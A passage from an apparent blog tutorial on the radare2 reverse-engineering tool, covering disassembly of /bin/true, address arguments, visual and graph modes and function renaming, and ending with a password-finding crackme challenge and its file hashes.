|      ||   0x004013f3      bae4404000     mov edx, str.GNU_coreutils  ; "GNU coreutils" @ 0x4040e4
|      ||   0x004013f8      be64404000     mov esi, str.true           ; "true" @ 0x404064
|      ||   0x004013fd      e86e220000     call fcn.00403670
|      `--> 0x00401402      31c0           xor eax, eax
|       |   0x00401404      5b             pop rbx
|       |   0x00401405      c3             ret
|       `-> 0x00401406      31ff           xor edi, edi
|           0x00401408      e803010000     call fcn.00401510
\           0x0040140d      0f1f00         nop dword [rax]

Nearly all radare commands which operate on addresses (like disassemble) accept an argument, introduced by an @, to specify a different position instead of the current one. Therefore a

pdf @sym.main

produces the same result. You like the tree view of IDA? Enter the visual mode of radare by entering V. Now you see a hex editor which you can navigate through. By typing ?, you’ll get a list of the available keyboard shortcuts for this mode. Press V (capital v) to get this:

Graph view of /bin/true

Awesome, isn’t it? Now let’s rename the function fcn.00401510 in our disassembly to a more meaningful name. This could either be done by

s fcn.00401510

afn better_name

Or by using

afn better_name fcn.00401510


afn better_name 0x00401510


afn better_name @fcn.00401510


afn better_name @0x00401510


If you’re a little afraid of this huge amount of command line fu, you could also try the web interface:

r2 -c=H your_binary

Which gets you this:

Radare 2 Web interface

Challenge 0x01

You will find the first challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge01) = b6449993d4278f9884f45018fc128d15
MD5 (challenge01.exe) = 1d78ad3807163cfb7b5194c1c22308c4
MD5 (challenge01-static) = 833cdfe2b105dfda82d3d4a28bab04bd
SHA1 (challenge01) = 55d7755be8ea872601e2c22172c8beccefca37cc
SHA1 (challenge01.exe) = 108837eeffb6635aa08e0d5607ba4d502d556f32
SHA1 (challenge01-static) = 2ad83f289e94c3326d3729fc2c04f32582aba8a3
SHA256 (challenge01) = 56f239d74bdafd8c2d27c07dff9c66dc92780a4742882b9b8724bce7cc6fb0d1
SHA256 (challenge01.exe) = 9ef57cbd343489317bef66de436ebe7544760b48414ca2247ced1ce462b4591d
SHA256 (challenge01-static) = 99f15536cc8a4a68e6211c3af6a0b327c875373659bf7100363319e168c0deb7


Your goal is to find the correct password for the login in the binary (hint: hardcoded passwords are bad). Next time I’ll give you a walkthrough for the challenge and challenge #2.

Happy reversing!